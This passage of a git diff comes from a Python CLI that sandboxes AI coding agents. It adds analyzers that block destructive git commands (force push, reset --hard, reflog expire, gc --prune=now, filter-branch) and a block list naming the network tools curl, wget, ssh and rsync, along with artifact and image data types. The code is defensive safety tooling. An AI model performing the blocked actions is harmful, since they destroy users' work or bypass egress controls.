clear permanently deletes ALL stashes.\n\n" + "Safe alternative: Review with git stash list first" + ), + "clean_force": ( + "BLOCKED: git clean -f destroys untracked files.\n\n" + "Safe alternative: git clean -n (dry-run preview)" + ), + "checkout_path": ( + "BLOCKED: git checkout -- destroys uncommitted changes.\n\n" + "Safe alternative: git stash (preserves changes)" + ), + "restore_worktree": ( + "BLOCKED: git restore destroys uncommitted changes.\n\n" + "Safe alternatives:\n" + " - git stash (preserves changes)\n" + " - git restore --staged (only unstages, doesn't discard)" + ), +} + +# Maps BLOCK_MESSAGES key → matched_rule identifier +_RULE_NAMES: dict[str, str] = { + "force_push": "git.force_push", + "push_mirror": "git.push_mirror", + "reflog_expire": "git.reflog_expire", + "gc_prune": "git.gc_prune", + "filter_branch": "git.filter_branch", + "reset_hard": "git.reset_hard", + "branch_force_delete": "git.branch_force_delete", + "stash_drop": "git.stash_drop", + "stash_clear": "git.stash_clear", + "clean_force": "git.clean_force", + "checkout_path": "git.checkout_path", + "restore_worktree": "git.restore_worktree", +} + + +def _block(key: str) -> SafetyVerdict: + """Build a block SafetyVerdict from a BLOCK_MESSAGES key.""" + return SafetyVerdict( + allowed=False, + reason=BLOCK_MESSAGES[key], + matched_rule=_RULE_NAMES[key], + command_family=CommandFamily.DESTRUCTIVE_GIT, + ) + + +def analyze_push(args: list[str]) -> SafetyVerdict | None: + """Analyze git push for destructive patterns. + + Blocks: + - git push --force + - git push -f + - git push +refspec + - git push --mirror + + Allows: + - git push --force-with-lease + """ + # Block --mirror (overwrites entire remote) + if "--mirror" in args: + return _block("push_mirror") + + # Allow --force-with-lease (safe) + if has_force_with_lease(args): + return None + + # Block --force, -f, or combined flags containing 'f' + if has_force_flag(args): + return _block("force_push") + + # Block +refspec patterns + if has_force_refspec(args): + return _block("force_push") + + return None + + +def analyze_reset(args: list[str]) -> SafetyVerdict | None: + """Analyze git reset for destructive patterns. + + Blocks: + - git reset --hard + + Allows: + - git reset (default mixed) + - git reset --soft + - git reset --mixed + """ + if "--hard" in args: + return _block("reset_hard") + return None + + +def analyze_branch(args: list[str]) -> SafetyVerdict | None: + """Analyze git branch for destructive patterns. + + Blocks: + - git branch -D (force delete) + - git branch --delete --force + + Allows: + - git branch -d (safe delete with merge check) + """ + # Check for -D specifically (uppercase) + if "-D" in args: + return _block("branch_force_delete") + + # Check for combined --delete --force + has_delete = "--delete" in args or any( + a.startswith("-") and not a.startswith("--") and "d" in a.lower() for a in args + ) + if has_delete and "--force" in args: + return _block("branch_force_delete") + + return None + + +def analyze_stash(args: list[str]) -> SafetyVerdict | None: + """Analyze git stash for destructive patterns. + + Blocks: + - git stash drop + - git stash clear + + Allows: + - git stash (push) + - git stash pop + - git stash apply + - git stash list + """ + if not args: + return None + + subcommand = args[0] + if subcommand == "drop": + return _block("stash_drop") + if subcommand == "clear": + return _block("stash_clear") + + return None + + +def analyze_clean(args: list[str]) -> SafetyVerdict | None: + """Analyze git clean for destructive patterns. + + Blocks: + - git clean -f + - git clean -fd + - git clean -xfd + - Any combination containing -f without -n/--dry-run + + Allows: + - git clean -n (dry-run) + - git clean --dry-run + """ + # Allow dry-run mode + has_dry_run = "-n" in args or "--dry-run" in args + if has_dry_run: + return None + + # Block any force flag (including combined like -xfd) + if has_force_flag(args): + return _block("clean_force") + + return None + + +def analyze_checkout(args: list[str]) -> SafetyVerdict | None: + """Analyze git checkout for destructive patterns. + + Blocks: + - git checkout -- + - git checkout HEAD -- + - git checkout -- (when reverting changes) + + Allows: + - git checkout (switching branches) + - git checkout -b (creating branch) + """ + if not args: + return None + + # Look for -- separator (indicates path checkout) + try: + separator_idx = args.index("--") + # If there are paths after --, this is a destructive path checkout + if separator_idx < len(args) - 1: + return _block("checkout_path") + except ValueError: + pass + + return None + + +def analyze_restore(args: list[str]) -> SafetyVerdict | None: + """Analyze git restore for destructive patterns. + + Blocks: + - git restore (worktree restore) + - git restore --worktree + + Allows: + - git restore --staged (only unstages) + """ + if not args: + return None + + # Allow --staged only (safe: just unstages) + has_staged = "--staged" in args or "-S" in args + has_worktree = "--worktree" in args or "-W" in args + + # If only --staged and not --worktree, it's safe + if has_staged and not has_worktree: + return None + + # Check if there are path arguments (non-flag arguments) + paths = [a for a in args if not a.startswith("-")] + if paths: + # Has paths and either: + # - explicit --worktree, or + # - no --staged (worktree is default for paths) + if has_worktree or not has_staged: + return _block("restore_worktree") + + return None + + +# ───────────────────────────────────────────────────────────────────────────── +# Catastrophic Command Detection (v0.2.0) +# ───────────────────────────────────────────────────────────────────────────── + + +def analyze_reflog(args: list[str]) -> SafetyVerdict | None: + """Analyze git reflog for destructive patterns. + + Blocks: + - git reflog expire --expire-unreachable=now + - git reflog expire --expire-unreachable now + + Allows: + - git reflog (show) + - git reflog show + - git reflog expire (without =now) + """ + if "expire" not in args: + return None + + # Handle both --expire-unreachable=now and --expire-unreachable now + for i, token in enumerate(args): + if "--expire-unreachable=now" in token: + return _block("reflog_expire") + if token == "--expire-unreachable": + if i + 1 < len(args) and args[i + 1] == "now": + return _block("reflog_expire") + + return None + + +def analyze_gc(args: list[str]) -> SafetyVerdict | None: + """Analyze git gc for destructive patterns. + + Blocks: + - git gc --prune=now + - git gc --prune now + + Allows: + - git gc (default prune with grace period) + - git gc --prune=2.weeks.ago + """ + # Handle both --prune=now and --prune now + for i, token in enumerate(args): + if "--prune=now" in token: + return _block("gc_prune") + if token == "--prune": + if i + 1 < len(args) and args[i + 1] == "now": + return _block("gc_prune") + + return None + + +def analyze_filter_branch(args: list[str]) -> SafetyVerdict | None: + """Analyze git filter-branch (always blocked). + + git filter-branch is always destructive and has been + deprecated in favor of git filter-repo. + + Blocks: + - git filter-branch (any invocation) + """ + # filter-branch is always destructive + return _block("filter_branch") + + +# ───────────────────────────────────────────────────────────────────────────── +# Main Analysis Entry Point +# ───────────────────────────────────────────────────────────────────────────── + + +def analyze_git(tokens: list[str]) -> SafetyVerdict | None: + """Analyze git command tokens for destructive operations. + + Args: + tokens: Command tokens starting with 'git' + + Returns: + SafetyVerdict if destructive, None if allowed + """ + subcommand, args = normalize_git_tokens(tokens) + + if not subcommand: + return None + + # Global DX bypass - check BEFORE any analyzer + # git help is always safe + if subcommand == "help": + return None + + # --help, -h, --version flags make any command safe (just shows help) + if "--help" in args or "-h" in args or "--version" in args: + return None + + # Route to specific analyzers + analyzers: dict[str, Callable[[list[str]], SafetyVerdict | None]] = { + "push": analyze_push, + "reset": analyze_reset, + "branch": analyze_branch, + "stash": analyze_stash, + "clean": analyze_clean, + "checkout": analyze_checkout, + "restore": analyze_restore, + # Catastrophic commands (v0.2.0) + "reflog": analyze_reflog, + "gc": analyze_gc, + "filter-branch": analyze_filter_branch, + } + + analyzer = analyzers.get(subcommand) + if analyzer: + return analyzer(args) + + return None diff --git a/src/scc_cli/core/governed_artifacts.py b/src/scc_cli/core/governed_artifacts.py new file mode 100644 index 0000000..aba066b --- /dev/null +++ b/src/scc_cli/core/governed_artifacts.py @@ -0,0 +1,196 @@ +"""Governed artifact type hierarchy from spec-06. + +These models define the provider-neutral bundle architecture's type surface. +They are pure data definitions — no behavioral logic, no provider-specific +assumptions. + +Terminology: + GovernedArtifact – one approved reusable unit in SCC policy + ArtifactBundle – team-facing selection unit (a named group of artifacts) + ProviderArtifactBinding – provider-native rendering detail for one artifact + ArtifactRenderPlan – effective per-session materialization plan after policy merge +""" + +from __future__ import annotations + +from dataclasses import dataclass, field +from enum import Enum + +# --------------------------------------------------------------------------- +# Enums +# --------------------------------------------------------------------------- + + +class ArtifactKind(str, Enum): + """Kind of governed artifact. + + Values: + SKILL: open Agent Skills package, shared across providers. + MCP_SERVER: provider-neutral MCP definition plus transport metadata. + NATIVE_INTEGRATION: provider-specific hooks, rules, plugin folders, etc. + BUNDLE: named grouping of skills, MCP servers, and native integrations. + """ + + SKILL = "skill" + MCP_SERVER = "mcp_server" + NATIVE_INTEGRATION = "native_integration" + BUNDLE = "bundle" + + +class ArtifactInstallIntent(str, Enum): + """Installation intent for a governed artifact or bundle. + + Values: + REQUIRED: render/install automatically for the selected provider. + AVAILABLE: expose for opt-in or browsing, not auto-enabled. + DISABLED: explicitly not allowed in the effective session. + REQUEST_ONLY: visible as an approved request target, not effective until promoted. + """ + + REQUIRED = "required" + AVAILABLE = "available" + DISABLED = "disabled" + REQUEST_ONLY = "request-only" + + +# --------------------------------------------------------------------------- +# Data models +# --------------------------------------------------------------------------- + + +@dataclass(frozen=True) +class GovernedArtifact: + """One approved reusable unit in SCC policy. + + Carries kind, identity, provenance, and pinning metadata. Bindings for + native integrations are held separately in ProviderArtifactBinding. + + Attributes: + kind: What category this artifact belongs to. + name: Stable human-readable identifier. + version: Pinned version or source ref, if known. + publisher: Owner or publisher metadata for audit purposes. + pinned: Whether the artifact version is locked. + source_type: Origin kind — ``git``, ``url``, ``local``, etc. + source_url: Remote location of the artifact source. + source_path: Path within the source tree, if applicable. + source_ref: Git ref, tag, or commit for pinning. + install_intent: Operator expectation for this artifact. + """ + + kind: ArtifactKind + name: str + version: str | None = None + publisher: str | None = None + pinned: bool = False + source_type: str | None = None + source_url: str | None = None + source_path: str | None = None + source_ref: str | None = None + install_intent: ArtifactInstallIntent = ArtifactInstallIntent.AVAILABLE + + +@dataclass(frozen=True) +class ProviderArtifactBinding: + """Provider-native rendering details for one governed artifact. + + Each binding is provider-specific — Claude and Codex are NOT flattened + into a shared shape. The ``native_config`` dict holds arbitrary + provider-scoped key-value pairs (hooks paths, plugin bundle paths, + rules file references, etc.). + + Attributes: + provider: Target provider identifier (e.g. ``claude``, ``codex``). + native_ref: Primary native reference for the binding, if any. + native_config: Flexible key-value config for provider-specific detail. + transport_type: Transport hint for MCP or integration bindings. + """ + + provider: str + native_ref: str | None = None + native_config: dict[str, str] = field(default_factory=dict) + transport_type: str | None = None + + +@dataclass(frozen=True) +class ArtifactBundle: + """Team-facing selection unit — a named approved grouping. + + Teams enable bundles, not raw provider plugin references. + + Attributes: + name: Stable bundle identifier. + description: Human-readable explanation of the bundle purpose. + artifacts: Ordered artifact names that compose this bundle. + install_intent: Operator expectation for the bundle as a whole. + """ + + name: str + description: str = "" + artifacts: tuple[str, ...] = () + install_intent: ArtifactInstallIntent = ArtifactInstallIntent.AVAILABLE + + +@dataclass(frozen=True) +class PortableArtifact: + """A portable artifact that can be rendered without a provider-specific binding. + + Skills and MCP servers are inherently portable — they work on any provider. + When they appear in a bundle without a provider-specific binding, the + resolver includes them here so renderers can project them into + provider-native surfaces using the artifact's own source metadata. + + Attributes: + name: Artifact name matching the GovernedArtifact.name. + kind: Artifact kind (SKILL or MCP_SERVER only). + source_type: Origin kind — ``git``, ``url``, ``local``, etc. + source_url: Remote location of the artifact source. + source_path: Path within the source tree, if applicable. + source_ref: Git ref, tag, or commit for pinning. + version: Pinned version, if known. + """ + + name: str + kind: ArtifactKind + source_type: str | None = None + source_url: str | None = None + source_path: str | None = None + source_ref: str | None = None + version: str | None = None + + +@dataclass(frozen=True) +class ArtifactRenderPlan: + """Effective per-session materialization plan after policy merge. + + Produced by core after org/team/project/user policy merge, consumed by + the selected provider adapter for projection into native files. + + Attributes: + bundle_id: Source bundle identifier this plan was derived from. + provider: Target provider for this render pass. + bindings: Provider-native bindings to render. + skipped: Artifact names that could not be rendered for this provider. + effective_artifacts: Artifact names included in the effective plan. + portable_artifacts: Portable skills and MCP servers that have no + provider-specific binding but are still renderable using their + source metadata (D023). + """ + + bundle_id: str + provider: str + bindings: tuple[ProviderArtifactBinding, ...] = () + skipped: tuple[str, ...] = () + effective_artifacts: tuple[str, ...] = () + portable_artifacts: tuple[PortableArtifact, ...] = () + + +__all__ = [ + "ArtifactBundle", + "ArtifactInstallIntent", + "ArtifactKind", + "ArtifactRenderPlan", + "GovernedArtifact", + "PortableArtifact", + "ProviderArtifactBinding", +] diff --git a/src/scc_cli/core/image_contracts.py b/src/scc_cli/core/image_contracts.py new file mode 100644 index 0000000..a5ad760 --- /dev/null +++ b/src/scc_cli/core/image_contracts.py @@ -0,0 +1,130 @@ +"""Typed image reference contracts and SCC-owned image constants. + +Provides a frozen ImageRef dataclass for provider-neutral OCI image +references, a parse helper, and the constant image definitions that +SCC builds and consumes in plain OCI mode. + +Usage: + from scc_cli.core.image_contracts import ( + ImageRef, + image_ref, + SCC_BASE_IMAGE, + SCC_CLAUDE_IMAGE, + SCC_CLAUDE_IMAGE_REF, + ) +""" + +from __future__ import annotations + +from dataclasses import dataclass + + +@dataclass(frozen=True) +class ImageRef: + """Immutable OCI image reference with structured fields. + + Attributes: + registry: Optional registry hostname (e.g. ``ghcr.io``). + repository: Image repository name (e.g. ``scc-base``). + tag: Image tag, defaults to ``latest``. + digest: Optional content-addressable digest (e.g. ``sha256:abc...``). + """ + + repository: str + registry: str = "" + tag: str = "latest" + digest: str | None = None + + def full_ref(self) -> str: + """Return the canonical image reference string. + + Builds ``[registry/]repository[:tag][@digest]``, omitting + empty components. + """ + parts: list[str] = [] + if self.registry: + parts.append(f"{self.registry}/{self.repository}") + else: + parts.append(self.repository) + + if self.tag: + parts[0] = f"{parts[0]}:{self.tag}" + + if self.digest: + parts[0] = f"{parts[0]}@{self.digest}" + + return parts[0] + + +def image_ref(ref_string: str) -> ImageRef: + """Parse a Docker/OCI image reference string into an ImageRef. + + Handles common formats: + - ``repo`` → tag defaults to ``latest`` + - ``repo:tag`` + - ``registry/repo:tag`` + - ``registry/repo@sha256:abc...`` + - ``registry/repo:tag@sha256:abc...`` + + Args: + ref_string: Raw image reference string. + + Returns: + Parsed ImageRef with structured fields. + """ + digest: str | None = None + remainder = ref_string + + # Extract digest first (everything after @) + if "@" in remainder: + remainder, digest = remainder.rsplit("@", 1) + + # Extract tag (everything after the last colon that isn't part of a port) + tag = "latest" + if ":" in remainder: + # Find the last colon — that separates repo from tag + before_colon, after_colon = remainder.rsplit(":", 1) + # If after_colon looks like a port number inside a registry + # (e.g. localhost:5000/repo), don't treat it as a tag + if "/" in after_colon: + # Colon was part of registry:port/repo, no explicit tag + tag = "latest" + else: + tag = after_colon + remainder = before_colon + + # Split registry from repository on the first slash + registry = "" + repository = remainder + if "/" in remainder: + first, rest = remainder.split("/", 1) + # Heuristic: a registry contains a dot, a colon, or is "localhost" + if "." in first or ":" in first or first == "localhost": + registry = first + repository = rest + else: + # Treat the whole thing as the repository (e.g. library/ubuntu) + repository = remainder + + return ImageRef( + registry=registry, + repository=repository, + tag=tag, + digest=digest, + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# SCC-Owned Image Constants +# ───────────────────────────────────────────────────────────────────────────── + +SCC_BASE_IMAGE = ImageRef(repository="scc-base", tag="latest") + +SCC_CLAUDE_IMAGE = ImageRef(repository="scc-agent-claude", tag="latest") + +# Plain string for use in SandboxSpec.image and docker commands +SCC_CLAUDE_IMAGE_REF = "scc-agent-claude:latest" + +SCC_CODEX_IMAGE = ImageRef(repository="scc-agent-codex", tag="latest") + +SCC_CODEX_IMAGE_REF = "scc-agent-codex:latest" diff --git a/src/scc_cli/core/network_policy.py b/src/scc_cli/core/network_policy.py index b910dc0..34f48d1 100644 --- a/src/scc_cli/core/network_policy.py +++ b/src/scc_cli/core/network_policy.py @@ -7,9 +7,9 @@ from .enums import NetworkPolicy _NETWORK_POLICY_ORDER = { - NetworkPolicy.UNRESTRICTED.value: 0, - NetworkPolicy.CORP_PROXY_ONLY.value: 1, - NetworkPolicy.ISOLATED.value: 2, + NetworkPolicy.OPEN.value: 0, + NetworkPolicy.WEB_EGRESS_ENFORCED.value: 1, + NetworkPolicy.LOCKED_DOWN_WEB.value: 2, } diff --git a/src/scc_cli/core/network_tool_rules.py b/src/scc_cli/core/network_tool_rules.py new file mode 100644 index 0000000..a91bedb --- /dev/null +++ b/src/scc_cli/core/network_tool_rules.py @@ -0,0 +1,53 @@ +"""Network tool detection rules for command safety analysis. + +V1 defense-in-depth layer: detects commands that invoke tools capable of +external network access. This is supplementary to topology+proxy enforcement — +it provides denial UX and audit signals when an agent attempts to shell out +to curl, wget, ssh, etc. + +References: D014, D015 in DECISIONS.md. +""" + +from __future__ import annotations + +from pathlib import PurePosixPath + +from scc_cli.core.contracts import SafetyVerdict +from scc_cli.core.enums import CommandFamily + +# Tools that access external network +NETWORK_TOOLS: frozenset[str] = frozenset({"curl", "wget", "ssh", "scp", "sftp", "rsync"}) + + +def analyze_network_tool(tokens: list[str]) -> SafetyVerdict | None: + """Check if the command invokes a known network access tool. + + Detects both bare names (curl) and path-qualified binaries + (/usr/bin/curl). The check applies to the first token only — + network tool names appearing as arguments are ignored. + + Args: + tokens: Command tokens (after wrapper stripping). + + Returns: + SafetyVerdict blocking the command if a network tool is detected, + None if the command is not a network tool. + """ + if not tokens or not tokens[0]: + return None + + # Strip path to get the bare binary name + tool_name = PurePosixPath(tokens[0]).name + + if tool_name in NETWORK_TOOLS: + return SafetyVerdict( + allowed=False, + reason=( + f"BLOCKED: {tool_name} may access external network. " + f"Network access is controlled by the egress proxy." + ), + matched_rule=f"network.{tool_name}", + command_family=CommandFamily.NETWORK_TOOL, + ) + + return None diff --git a/src/scc_cli/core/personal_profiles.py b/src/scc_cli/core/personal_profiles.py index 7ed65d6..04f2ec3 100644 --- a/src/scc_cli/core/personal_profiles.py +++ b/src/scc_cli/core/personal_profiles.py @@ -11,12 +11,21 @@ from dataclasses import dataclass from datetime import datetime, timezone from pathlib import Path -from typing import Any, cast -from urllib.parse import urlparse +from typing import Any from scc_cli import config as config_module -from scc_cli.core.enums import DiffItemSection, DiffItemStatus -from scc_cli.marketplace.managed import load_managed_state + +# Re-export merge/diff symbols for backward compatibility +from scc_cli.core.personal_profiles_merge import ( # noqa: F401 + DiffItem, + StructuredDiff, + build_diff_text, + compute_sandbox_import_candidates, + compute_structured_diff, + merge_personal_mcp, + merge_personal_settings, + merge_sandbox_imports, +) from scc_cli.subprocess_utils import run_command PROFILE_VERSION = "1" @@ -91,6 +100,8 @@ def _ensure_personal_dir() -> Path: def _normalize_remote_url(url: str) -> str: + from urllib.parse import urlparse + url = url.strip() if not url: return url @@ -488,86 +499,6 @@ def detect_drift(workspace: Path) -> bool: return current != state.fingerprints -def merge_personal_settings( - workspace: Path, - existing: dict[str, Any], - personal: dict[str, Any], -) -> dict[str, Any]: - """Merge personal settings without overwriting user customizations. - - - Personal overrides may replace team-managed entries - - Existing user edits are preserved - """ - managed = load_managed_state(workspace) - managed_plugins = set(managed.managed_plugins) - managed_marketplaces = set(managed.managed_marketplaces) - - merged = dict(existing) - - existing_plugins_raw = existing.get("enabledPlugins", {}) - if isinstance(existing_plugins_raw, list): - existing_plugins: dict[str, bool] = {p: True for p in existing_plugins_raw} - else: - existing_plugins = dict(existing_plugins_raw) - - personal_plugins_raw = personal.get("enabledPlugins", {}) - if isinstance(personal_plugins_raw, list): - personal_plugins = {p: True for p in personal_plugins_raw} - else: - personal_plugins = dict(personal_plugins_raw) - - for plugin, enabled in personal_plugins.items(): - if plugin in managed_plugins or plugin not in existing_plugins: - existing_plugins[plugin] = enabled - - merged["enabledPlugins"] = existing_plugins - - existing_marketplaces = existing.get("extraKnownMarketplaces", {}) - if isinstance(existing_marketplaces, list): - existing_marketplaces = {} - - personal_marketplaces = personal.get("extraKnownMarketplaces", {}) - if isinstance(personal_marketplaces, list): - personal_marketplaces = {} - - for name, config in personal_marketplaces.items(): - if name not in existing_marketplaces: - existing_marketplaces[name] = config - continue - - source = existing_marketplaces.get(name, {}).get("source", {}) - path = source.get("path", "") - if path in managed_marketplaces: - existing_marketplaces[name] = config - - merged["extraKnownMarketplaces"] = existing_marketplaces - - for key, value in personal.items(): - if key in {"enabledPlugins", "extraKnownMarketplaces"}: - continue - if key not in merged: - merged[key] = value - continue - if isinstance(merged.get(key), dict) and isinstance(value, dict): - for sub_key, sub_value in value.items(): - if sub_key not in merged[key]: - merged[key][sub_key] = sub_value - - return merged - - -def merge_personal_mcp(existing: dict[str, Any], personal: dict[str, Any]) -> dict[str, Any]: - if not personal: - return existing - if not existing: - return personal - merged = json.loads(json.dumps(personal)) - config_module.deep_merge(merged, existing) - if isinstance(merged, dict): - return cast(dict[str, Any], merged) - return {} - - def workspace_has_overrides(workspace: Path) -> bool: return _settings_path(workspace).exists() or _mcp_path(workspace).exists() @@ -584,224 +515,8 @@ def extract_personal_mcp(profile: PersonalProfile) -> dict[str, Any]: return profile.mcp or {} -def _normalize_plugins(value: Any) -> dict[str, bool]: - if isinstance(value, list): - return {str(p): True for p in value} - if isinstance(value, dict): - return {str(k): bool(v) for k, v in value.items()} - return {} - - -def _normalize_marketplaces(value: Any) -> dict[str, Any]: - return value if isinstance(value, dict) else {} - - -def compute_sandbox_import_candidates( - workspace_settings: dict[str, Any] | None, - sandbox_settings: dict[str, Any] | None, -) -> tuple[list[str], dict[str, Any]]: - """Return plugins/marketplaces present in sandbox settings but missing in workspace.""" - if not sandbox_settings: - return [], {} - - workspace_settings = workspace_settings or {} - - workspace_plugins = _normalize_plugins(workspace_settings.get("enabledPlugins")) - sandbox_plugins = _normalize_plugins(sandbox_settings.get("enabledPlugins")) - missing_plugins = sorted([p for p in sandbox_plugins if p not in workspace_plugins]) - - workspace_marketplaces = _normalize_marketplaces( - workspace_settings.get("extraKnownMarketplaces") - ) - sandbox_marketplaces = _normalize_marketplaces(sandbox_settings.get("extraKnownMarketplaces")) - missing_marketplaces = { - name: config - for name, config in sandbox_marketplaces.items() - if name not in workspace_marketplaces - } - - return missing_plugins, missing_marketplaces - - -def merge_sandbox_imports( - workspace_settings: dict[str, Any], - missing_plugins: list[str], - missing_marketplaces: dict[str, Any], -) -> dict[str, Any]: - if not missing_plugins and not missing_marketplaces: - return workspace_settings - - merged = dict(workspace_settings) - - plugins_value = merged.get("enabledPlugins") - if isinstance(plugins_value, list): - plugins_map = {str(p): True for p in plugins_value} - elif isinstance(plugins_value, dict): - plugins_map = dict(plugins_value) - else: - plugins_map = {} - - for plugin in missing_plugins: - plugins_map[plugin] = True - if plugins_map: - merged["enabledPlugins"] = plugins_map - - marketplaces_value = merged.get("extraKnownMarketplaces") - if isinstance(marketplaces_value, dict): - marketplaces_map = dict(marketplaces_value) - else: - marketplaces_map = {} - marketplaces_map.update(missing_marketplaces) - if marketplaces_map: - merged["extraKnownMarketplaces"] = marketplaces_map - - return merged - - -def build_diff_text(label: str, before: dict[str, Any], after: dict[str, Any]) -> str: - import difflib - - before_text = json.dumps(before, indent=2, sort_keys=True).splitlines() - after_text = json.dumps(after, indent=2, sort_keys=True).splitlines() - diff_lines = difflib.unified_diff( - before_text, - after_text, - fromfile=f"{label} (current)", - tofile=f"{label} (personal)", - lineterm="", - ) - return "\n".join(diff_lines) - - -@dataclass -class DiffItem: - """A single diff item for the TUI overlay.""" - - name: str - status: DiffItemStatus # ADDED (+), REMOVED (-), MODIFIED (~) - section: DiffItemSection # PLUGINS, MCP_SERVERS, MARKETPLACES - - -@dataclass -class StructuredDiff: - """Structured diff for TUI display.""" - - items: list[DiffItem] - total_count: int - - @property - def is_empty(self) -> bool: - return len(self.items) == 0 - - -def compute_structured_diff( - workspace_settings: dict[str, Any] | None, - profile_settings: dict[str, Any] | None, - workspace_mcp: dict[str, Any] | None, - profile_mcp: dict[str, Any] | None, -) -> StructuredDiff: - """Compute structured diff between workspace and profile for TUI display. - - Args: - workspace_settings: Current workspace settings (settings.local.json) - profile_settings: Saved profile settings - workspace_mcp: Current workspace MCP config (.mcp.json) - profile_mcp: Saved profile MCP config - - Returns: - StructuredDiff with items showing additions, removals, modifications - """ - items: list[DiffItem] = [] - - workspace_settings = workspace_settings or {} - profile_settings = profile_settings or {} - workspace_mcp = workspace_mcp or {} - profile_mcp = profile_mcp or {} - - # Compare plugins - ws_plugins = _normalize_plugins(workspace_settings.get("enabledPlugins")) - prof_plugins = _normalize_plugins(profile_settings.get("enabledPlugins")) - - # Plugins in profile but not workspace (would be added on apply) - for plugin in sorted(prof_plugins.keys()): - if plugin not in ws_plugins: - items.append( - DiffItem(name=plugin, status=DiffItemStatus.ADDED, section=DiffItemSection.PLUGINS) - ) - - # Plugins in workspace but not profile (would be removed on apply) - for plugin in sorted(ws_plugins.keys()): - if plugin not in prof_plugins: - items.append( - DiffItem( - name=plugin, status=DiffItemStatus.REMOVED, section=DiffItemSection.PLUGINS - ) - ) - - # Compare marketplaces - ws_markets = _normalize_marketplaces(workspace_settings.get("extraKnownMarketplaces")) - prof_markets = _normalize_marketplaces(profile_settings.get("extraKnownMarketplaces")) - - for name in sorted(prof_markets.keys()): - if name not in ws_markets: - items.append( - DiffItem( - name=name, status=DiffItemStatus.ADDED, section=DiffItemSection.MARKETPLACES - ) - ) - elif prof_markets[name] != ws_markets[name]: - items.append( - DiffItem( - name=name, status=DiffItemStatus.MODIFIED, section=DiffItemSection.MARKETPLACES - ) - ) - - for name in sorted(ws_markets.keys()): - if name not in prof_markets: - items.append( - DiffItem( - name=name, status=DiffItemStatus.REMOVED, section=DiffItemSection.MARKETPLACES - ) - ) - - # Compare MCP servers - ws_servers = workspace_mcp.get("mcpServers", {}) - prof_servers = profile_mcp.get("mcpServers", {}) - - for name in sorted(prof_servers.keys()): - if name not in ws_servers: - items.append( - DiffItem( - name=name, status=DiffItemStatus.ADDED, section=DiffItemSection.MCP_SERVERS - ) - ) - elif prof_servers[name] != ws_servers[name]: - items.append( - DiffItem( - name=name, status=DiffItemStatus.MODIFIED, section=DiffItemSection.MCP_SERVERS - ) - ) - - for name in sorted(ws_servers.keys()): - if name not in prof_servers: - items.append( - DiffItem( - name=name, status=DiffItemStatus.REMOVED, section=DiffItemSection.MCP_SERVERS - ) - ) - - return StructuredDiff(items=items, total_count=len(items)) - - def get_profile_status(workspace: Path) -> ProfileStatus: - """Get profile status for TUI display. - - Returns a ProfileStatus with: - - exists: Whether a saved profile exists for this workspace - - has_drift: Whether workspace has drifted from last-applied profile - - import_count: Number of sandbox plugins available for import - - saved_at: When the profile was last saved (ISO format) - """ + """Get profile status for TUI display.""" profile = load_personal_profile(workspace) if not profile: diff --git a/src/scc_cli/core/personal_profiles_merge.py b/src/scc_cli/core/personal_profiles_merge.py new file mode 100644 index 0000000..7903b88 --- /dev/null +++ b/src/scc_cli/core/personal_profiles_merge.py @@ -0,0 +1,322 @@ +"""Merge, diff, and sandbox-import logic for personal profiles. + +Split from personal_profiles.py to reduce module size and remove the +core→marketplace boundary violation. The ``merge_personal_settings`` +function now accepts a ``managed_state_loader`` callable instead of +importing ``load_managed_state`` from the marketplace package. +""" + +from __future__ import annotations + +import json +from collections.abc import Callable +from dataclasses import dataclass +from pathlib import Path +from typing import Any, cast + +from scc_cli import config as config_module +from scc_cli.core.enums import DiffItemSection, DiffItemStatus + + +@dataclass +class DiffItem: + """A single diff item for the TUI overlay.""" + + name: str + status: DiffItemStatus # ADDED (+), REMOVED (-), MODIFIED (~) + section: DiffItemSection # PLUGINS, MCP_SERVERS, MARKETPLACES + + +@dataclass +class StructuredDiff: + """Structured diff for TUI display.""" + + items: list[DiffItem] + total_count: int + + @property + def is_empty(self) -> bool: + return len(self.items) == 0 + + +def _normalize_plugins(value: Any) -> dict[str, bool]: + if isinstance(value, list): + return {str(p): True for p in value} + if isinstance(value, dict): + return {str(k): bool(v) for k, v in value.items()} + return {} + + +def _normalize_marketplaces(value: Any) -> dict[str, Any]: + return value if isinstance(value, dict) else {} + + +def merge_personal_settings( + workspace: Path, + existing: dict[str, Any], + personal: dict[str, Any], + *, + managed_state_loader: Callable[[Path], Any] | None = None, +) -> dict[str, Any]: + """Merge personal settings without overwriting user customizations. + + - Personal overrides may replace team-managed entries + - Existing user edits are preserved + + Args: + workspace: Workspace directory path. + existing: Current workspace settings. + personal: Personal profile settings to merge. + managed_state_loader: Callable that loads managed state for a workspace. + When ``None``, falls back to ``marketplace.managed.load_managed_state``. + """ + if managed_state_loader is None: + raise ValueError( + "managed_state_loader is required — pass marketplace.managed.load_managed_state " + "from the application layer" + ) + + managed = managed_state_loader(workspace) + managed_plugins = set(managed.managed_plugins) + managed_marketplaces = set(managed.managed_marketplaces) + + merged = dict(existing) + + existing_plugins_raw = existing.get("enabledPlugins", {}) + if isinstance(existing_plugins_raw, list): + existing_plugins: dict[str, bool] = {p: True for p in existing_plugins_raw} + else: + existing_plugins = dict(existing_plugins_raw) + + personal_plugins_raw = personal.get("enabledPlugins", {}) + if isinstance(personal_plugins_raw, list): + personal_plugins = {p: True for p in personal_plugins_raw} + else: + personal_plugins = dict(personal_plugins_raw) + + for plugin, enabled in personal_plugins.items(): + if plugin in managed_plugins or plugin not in existing_plugins: + existing_plugins[plugin] = enabled + + merged["enabledPlugins"] = existing_plugins + + existing_marketplaces = existing.get("extraKnownMarketplaces", {}) + if isinstance(existing_marketplaces, list): + existing_marketplaces = {} + + personal_marketplaces = personal.get("extraKnownMarketplaces", {}) + if isinstance(personal_marketplaces, list): + personal_marketplaces = {} + + for name, config in personal_marketplaces.items(): + if name not in existing_marketplaces: + existing_marketplaces[name] = config + continue + + source = existing_marketplaces.get(name, {}).get("source", {}) + path = source.get("path", "") + if path in managed_marketplaces: + existing_marketplaces[name] = config + + merged["extraKnownMarketplaces"] = existing_marketplaces + + for key, value in personal.items(): + if key in {"enabledPlugins", "extraKnownMarketplaces"}: + continue + if key not in merged: + merged[key] = value + continue + if isinstance(merged.get(key), dict) and isinstance(value, dict): + for sub_key, sub_value in value.items(): + if sub_key not in merged[key]: + merged[key][sub_key] = sub_value + + return merged + + +def merge_personal_mcp(existing: dict[str, Any], personal: dict[str, Any]) -> dict[str, Any]: + if not personal: + return existing + if not existing: + return personal + merged = json.loads(json.dumps(personal)) + config_module.deep_merge(merged, existing) + if isinstance(merged, dict): + return cast(dict[str, Any], merged) + return {} + + +def 